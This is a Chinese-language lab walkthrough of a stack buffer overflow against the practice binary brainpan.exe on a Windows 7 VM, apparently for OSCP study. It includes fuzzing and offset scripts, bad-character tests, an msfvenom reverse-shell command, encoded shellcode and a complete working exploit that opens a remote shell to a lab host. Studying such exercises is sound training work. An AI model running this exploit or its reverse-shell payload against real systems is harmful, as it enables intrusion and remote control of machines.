环境准备

Windows7虚拟机（我选了IE8，其实也没什么关系） 微软官方下载地址

These virtual machines expire after 90 days. We recommend setting a snapshot when you first install the virtual machine which you can roll back to later. Mac users will need to use a tool that supports zip64, like The Unarchiver, to unzip the files.

The password to your VM is "Passw0rd!"

进入虚拟机安装immunity debugger(检测到没有python2.7.1的话，它会自己安装的)

github下载mona.py，用于immunity debugger mona仓库

GitHub获取经典练习案例 链接

靶机IP：192.168.195.130

参考资料： 土司有个帖子有发pwk(oscp)的pdf扫描版、已通过大佬的博客

一般流程

1.fuzz触发溢出

2.控制EIP，即找到eip地址在我们溢出数据中的哪个位置

3.确认有多大的空间可以用来放shellcode

4.剔除会导致shellcode运行异常的坏字符

5.寻找跳板——jmp esp:

因为shellcode存放在esp中，但esp的地址是不固定的。所以我们eip中不能直接放esp的地址。

汇编中有一条指令 JMP ESP。如果我们能够找到包含这条指令的静态内存地址，那么我们就能修改EIP寄存器的值为JMP ESP的内存地址，由该指令跳转到ESP寄存器来执行我们的shellcode

具体练习

win7上先把brainpan.exe跑起来。用如下脚本尝试fuzz

import socket

buffers = [b"A"]
ip = "192.168.195.130"
port = 9999
addr = (ip, port)

counter = 100
while len(buffers) <= 30:
     buffers.append(b"A"*counter)
     counter = counter + 100

for buffer in buffers:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(addr)
    s.send(buffer)
    s.recv(4096)
    s.close()
    print("send  %s bytes" % len(buffer))

在600byte时目标程序崩溃。

下一步寻找eip的位置

打开immunity debugger attach到正在运行的brainpan.exe上去

修改上面的脚本，只发送如图所示payload。脚本运行后，immunity debugger在点击继续运行。发现变化

eip 35724134 （也就是5rA4）

我们找一下它在我们payload中的位置

eip = b'A' * 524 + b'aaaa' # a 61
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(addr)
s.send(eip)
s.recv(4096)
s.close()

验证一下发现eip确实变成了61616161

下面计算esp能放多少字符

把payload改为

buff = b'A' * 524 + b'aaaa' + b'C' * (3000 - 524 - 4) #3000是往大了写

可以看到esp里已经都是c了，在右下的栈图里，找出cccc的起点和终点

0028FD60，0028FF34

0028FF34 - 0028FD60 = 468

也就是说我们有468byte可以用来放shellcode。

下面来剔除坏字符：

将payload修改如下发送

badchars2 = (
        b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x00"
        b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x10"
        b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x20"
        b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x30"
        b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x40"
        b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x50"
        b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x60"
        b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x70"
        b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x80"
        b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\x90"
        b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xa0"
        b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xb0"
        b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xc0"
        b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xd0"
        b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xe0"
        b"\xe1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf0")
buff = b'A' * 524 + b'aaaa' + badchars

右键esp地址，选择follow in dump。左下窗口就会显示到esp.

可以发现00之后的字符并不是预计的11，说明被截断了。把badchars中的00替换成已确认无害的01继续测试，是否还有别的坏字符

可以看到剩余badchars都正常显示——即坏字符只有0x00

下面开始寻找跳板

immunity debugger 下方pycommands输入 !mona modules

The columns in this output include the current memory location (base and top addresses), the size

of the module, several flags, the module version, module name, and the path

可以看到brainpan.exe的系统保护机制和rebase都为Flase,可以直接利用。

使用nasm_shell来获得jmp esp的十六进制指令

┌──(wuerror㉿kali)-[~]
└─$ msf-nasm_shell
nasm > jmp esp
00000000  FFE4              jmp esp

接着用mona来寻找指令

!mona find -s "\xff\xe4" -m brainpan.exe

311712F3

x86 Windows是小端序,所以填入eip的值应该是\xf3\x12\x17\x31

接着生成shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.195.128 LPORT=4444 -b "\x00" -f python -e x86/shikata_ga_nai -a x86

部分代码如下

buf =  b""
buf += b"\xda\xcd\xd9\x74\x24\xf4\x58\x33\xc9\xba\x21\x6e\x49"
buf += b"\x45\xb1\x52\x31\x50\x17\x83\xc0\x04\x03\x71\x7d\xab"
buf += b"\xb0\x8d\x69\xa9\x3b\x6d\x6a\xce\xb2\x88\x5b\xce\xa1"
buf += b"\xd9\xcc\xfe\xa2\x8f\xe0\x75\xe6\x3b\x72\xfb\x2f\x4c"
buf += b"\x33\xb6\x09\x63\xc4\xeb\x6a\xe2\x46\xf6\xbe\xc4\x77"
buf += b"\x39\xb3\x05\xbf\x24\x3e\x57\x68\x22\xed\x47\x1d\x7e"
buf += b"\x2e\xec\x6d\x6e\x36\x11\x25\x91\x17\x84\x3d\xc8\xb7"
buf += b"\x27\x91\x60\xfe\x3f\xf6\x4d\x48\xb4\xcc\x3a\x4b\x1c"
buf += b"\x1d\xc2\xe0\x61\x91\x31\xf8\xa6\x16\xaa\x8f\xde\x64"
buf += b"\x57\x88\x25\x16\x83\x1d\xbd\xb0\x40\x85\x19\x40\x84"
buf += b"\x50\xea\x4e\x61\x16\xb4\x52\x74\xfb\xcf\x6f\xfd\xfa"
buf += b"\x1f\xe6\x45\xd9\xbb\xa2\x1e\x40\x9a\x0e\xf0\x7d\xfc"
buf += b"\xf0\xad\xdb\x77\x1c\xb9\x51\xda\x49\x0e\x58\xe4\x89"
buf += b"\x18\xeb\x97\xbb\x87\x47\x3f\xf0\x40\x4e\xb8\xf7\x7a"
buf += b"\x36\x56\x06\x85\x47\x7f\xcd\xd1\x17\x17\xe4\x59\xfc"
buf += b"\xe7\x09\x8c\x53\xb7\xa5\x7f\x14\x67\x06\xd0\xfc\x6d"
buf += b"\x89\x0f\x1c\x8e\x43\x38\xb7\x75\x04\x87\xe0\xb6\x54"
buf += b"\x6f\xf3\x38\x44\x2c\x7a\xde\x0c\xdc\x2a\x49\xb9\x45"
buf += b"\x77\x01\x58\x89\xad\x6c\x5a\x01\x42\x91\x15\xe2\x2f"
buf += b"\x81\xc2\x02\x7a\xfb\x45\x1c\x50\x93\x0a\x8f\x3f\x63"
buf += b"\x44\xac\x97\x34\x01\x02\xee\xd0\xbf\x3d\x58\xc6\x3d"
buf += b"\xdb\xa3\x42\x9a\x18\x2d\x4b\x6f\x24\x09\x5b\xa9\xa5"
buf += b"\x15\x0f\x65\xf0\xc3\xf9\xc3\xaa\xa5\x53\x9a\x01\x6c"
buf += b"\x33\x5b\x6a\xaf\x45\x64\xa7\x59\xa9\xd5\x1e\x1c\xd6"
buf += b"\xda\xf6\xa8\xaf\x06\x67\x56\x7a\x83\x97\x1d\x26\xa2"
buf += b"\x3f\xf8\xb3\xf6\x5d\xfb\x6e\x34\x58\x78\x9a\xc5\x9f"
buf += b"\x60\xef\xc0\xe4\x26\x1c\xb9\x75\xc3\x22\x6e\x75\xc6"
buff = b'A' * 524 + b'\xf3\x12\x17\x31' + buf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(addr)
s.send(buff)
s.recv(4096)
s.close()

但是并没有接到反弹shell,用上述方法查看esp内容是否发生变化

取出来对比，可以发现shellcode的前16个字节发生了变化。

可以在shellcode的前面加上0x90进行保护

buff = b'A' * 524 + b'\xf3\x12\x17\x31' + b"\x90" * 16 + buf

执行成功反弹

最终exp:

import socket

ip = "192.168.195.130"
port = 9999
addr = (ip, port)

buf =  b""
buf += b"\xda\xcd\xd9\x74\x24\xf4\x58\x33\xc9\xba\x21\x6e\x49"
buf += b"\x45\xb1\x52\x31\x50\x17\x83\xc0\x04\x03\x71\x7d\xab"
buf += b"\xb0\x8d\x69\xa9\x3b\x6d\x6a\xce\xb2\x88\x5b\xce\xa1"
buf += b"\xd9\xcc\xfe\xa2\x8f\xe0\x75\xe6\x3b\x72\xfb\x2f\x4c"
buf += b"\x33\xb6\x09\x63\xc4\xeb\x6a\xe2\x46\xf6\xbe\xc4\x77"
buf += b"\x39\xb3\x05\xbf\x24\x3e\x57\x68\x22\xed\x47\x1d\x7e"
buf += b"\x2e\xec\x6d\x6e\x36\x11\x25\x91\x17\x84\x3d\xc8\xb7"
buf += b"\x27\x91\x60\xfe\x3f\xf6\x4d\x48\xb4\xcc\x3a\x4b\x1c"
buf += b"\x1d\xc2\xe0\x61\x91\x31\xf8\xa6\x16\xaa\x8f\xde\x64"
buf += b"\x57\x88\x25\x16\x83\x1d\xbd\xb0\x40\x85\x19\x40\x84"
buf += b"\x50\xea\x4e\x61\x16\xb4\x52\x74\xfb\xcf\x6f\xfd\xfa"
buf += b"\x1f\xe6\x45\xd9\xbb\xa2\x1e\x40\x9a\x0e\xf0\x7d\xfc"
buf += b"\xf0\xad\xdb\x77\x1c\xb9\x51\xda\x49\x0e\x58\xe4\x89"
buf += b"\x18\xeb\x97\xbb\x87\x47\x3f\xf0\x40\x4e\xb8\xf7\x7a"
buf += b"\x36\x56\x06\x85\x47\x7f\xcd\xd1\x17\x17\xe4\x59\xfc"
buf += b"\xe7\x09\x8c\x53\xb7\xa5\x7f\x14\x67\x06\xd0\xfc\x6d"
buf += b"\x89\x0f\x1c\x8e\x43\x38\xb7\x75\x04\x87\xe0\xb6\x54"
buf += b"\x6f\xf3\x38\x44\x2c\x7a\xde\x0c\xdc\x2a\x49\xb9\x45"
buf += b"\x77\x01\x58\x89\xad\x6c\x5a\x01\x42\x91\x15\xe2\x2f"
buf += b"\x81\xc2\x02\x7a\xfb\x45\x1c\x50\x93\x0a\x8f\x3f\x63"
buf += b"\x44\xac\x97\x34\x01\x02\xee\xd0\xbf\x3d\x58\xc6\x3d"
buf += b"\xdb\xa3\x42\x9a\x18\x2d\x4b\x6f\x24\x09\x5b\xa9\xa5"
buf += b"\x15\x0f\x65\xf0\xc3\xf9\xc3\xaa\xa5\x53\x9a\x01\x6c"
buf += b"\x33\x5b\x6a\xaf\x45\x64\xa7\x59\xa9\xd5\x1e\x1c\xd6"
buf += b"\xda\xf6\xa8\xaf\x06\x67\x56\x7a\x83\x97\x1d\x26\xa2"
buf += b"\x3f\xf8\xb3\xf6\x5d\xfb\x6e\x34\x58\x78\x9a\xc5\x9f"
buf += b"\x60\xef\xc0\xe4\x26\x1c\xb9\x75\xc3\x22\x6e\x75\xc6"
buff = b'A' * 524 + b'\xf3\x12\x17\x31' + b"\x90" * 16 + buf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(addr)
s.send(buff)
s.recv(4096)
s.close()